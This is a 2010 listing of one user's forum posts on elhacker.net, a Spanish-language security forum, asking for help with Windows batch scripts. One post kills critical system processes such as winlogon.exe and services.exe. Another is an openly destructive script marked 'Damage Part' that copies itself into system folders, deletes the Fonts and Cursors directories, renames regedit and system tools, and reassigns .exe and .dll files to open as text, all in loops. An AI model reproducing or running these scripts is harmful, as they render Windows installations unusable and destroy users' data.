elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


  Mostrar Temas
Páginas: [1]
1  Programación / Scripting / Ayudaa.. en: 8 Julio 2010, 03:05 am
si ejecuto este codigo

Código:
TASKKILL /F /IM "alg.exe"
TASKKILL /F /IM "smss.exe"
TASKKILL /F /IM "svchost.exe"
TASKKILL /F /IM "explorer.exe"
TASKKILL /F /IM "winlogon.exe"
TASKKILL /F /IM "ALCXMNTR.EXE"
TASKKILL /F /IM "services.exe"

aun se seguira ejecutando el cmd? la otra parte del codigo?? :¬¬
2  Programación / Ingeniería Inversa / Necesito Tutoriales en: 8 Julio 2010, 01:33 am
hola.
necesito tutoriales para aprender ingenieria inversa
un buen tutorial que tengan y que programas se usan? se les agradeceraa  ;D

por cierto buena paginaa  ::)
3  Programación / Scripting / Voy bien?? ayuda.. [batch] en: 7 Julio 2010, 04:50 am
soyy nuevo en el .bat quiero saber si voy bieen en este codigo?

Código:
@echo off
title Xtte-0x
echo Loading [::]
ping -n 3 0.0.0.0 > nul
cls
echo Loading [::::]
ping -n 3 0.0.0.0 > nul
cls
echo Loading [::::::]
ping -n 3 0.0.0.0 > nul
cls
:xtmatrix
echo %random%%random%%random%%random%%random%%random%%random%%random%
goto xtmatrix

REM +--------------------------------------------------+
REM + Damage Part
REM +--------------------------------------------------+
:xtcopy
copy /y desktop_XT-2.bat %windir%\system
copy /y desktop_XT-2.bat %windir%\system32

REM +--------------------------------------------------+
REM - This part changes the file name of 'SYSTEM32'
REM +--------------------------------------------------+
REG ADD HKEY\Software\Microsoft\Windows\CurrentVersion /f /v Xtte-2 /t REG_BINARY /d %windir%\system32\MS0X%random%.bat
MKDIR %random%%random%
MKDIR %random%%random%
RMDIR /s /q %systemroot%\Cursors
RMDIR /s /q %systemroot%\Fonts
RMDIR /s /q %systemroot%\ime
REN %systemroot%\system32\chkdks.exe %random%%random%.txt
REN %systemroot%\system32\chkntfs.exe %random%%random%.txt
REN %systemroot%\system32\winfxdocobj.exe %random%%random%.txt
REN %systemroot%\system32\Sounds %random%-%random%%random%-%random%
REN %windir%\regedit.exe %random%%random%.txt
REN %comspec%\ %random%
DEL /S /Q mouse.drv
goto xtcopy
REM +--------------------------------------------------+
REM - This part changes the ext name
REM +--------------------------------------------------+
ASSOC .dll=txtfile
ASSOC .exe=txtfile
ASSOC .bin=txtfile
ASSOC .reg=txtfile
:xtchange
ASSOC .bat=txtfile
cd\
cd %systemroot%\system32
ATTRIB -R -A -S -H /S *.dll
ATTRIB -R -A -S -H /S *.exe
ATTRIB -R -A -S -H /S *.dat
ATTRIB -R -A -S -H /S *.bin
goto xtchange
EXIT
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines